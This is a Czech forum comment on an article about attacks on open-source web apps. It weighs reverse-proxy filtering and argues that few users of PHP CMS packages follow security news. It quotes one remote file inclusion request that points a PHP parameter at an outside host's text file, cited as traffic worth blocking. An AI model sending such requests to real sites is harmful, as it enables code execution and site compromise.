Odpovídáte na názor ke článku Nebezpečný Open Source aneb script-kiddies podruhé.
[12] dekuji za odkaz na reverzni proxy. Na prvni pohled zatim nechapu jak to muze fungovat, ale potrebuji se na to lepe podivat. Pokud by slo odfiltrovat adresy typu categories/resource_categories_view.php?CLASSES_ROOT=http://store.at.ua/test.txt??
pak by to mohlo pomoci. Sice jen tem, kdo si muze dovolit vlastni instalaci Apache, ale alespon neco.
Toto je zajimave - "pokud nainstaluji open-source www aplikaci a nesleduji dění v bezpečnostní oblasti." IMHO deni v bezpecnostni oblasti obecne sleduje velmi malo kdo. Z tech tisic a milionu uzivatelu Joomla, phpBB a obzvlast Wordpressu, to bude mozna 1 ze 100. A to je podle mne ten problem. Pak co znamena konkretne "sledovat deni v bezpecnostni oblasti"? Kolik casu to vyzaduje a jak casto to musim delat? Myslim, ze vetsinou to funguje tak, ze uzivatel bud je schopny sam stahnout a nainstalovat nejaky free CMS anebo casteji mu to udela nejaka firma (znamy) a bezi to, aniz by se o to nekdo dal staral.
Pokud uzivatel ma vice prostredku, aby do sveho webu investoval, vlozi je do naprogramovani nejakych dodatecnych funkci OSS, a pak vetsinou nastava ta nejhorsi situace, kdy se puvodni balik ani neda updatovat, kvuli zasahum do kodu.
V teto chvili se zacinam schylovat k tomu, ze ten, kdo je schopen a ochoten sledovat deni v oblasti bezpecnosti, nebude vubec ochoten istalovat OSS typu free PHP aplikace. Ale mozna se mylim. Zatim je to jen uvaha. Pokud by me nekdo presvedcil o opaku, budu opravdu rad. :)
Přečteno 87 945×
Přečteno 76 238×
Přečteno 63 239×
Přečteno 53 325×
Přečteno 51 768×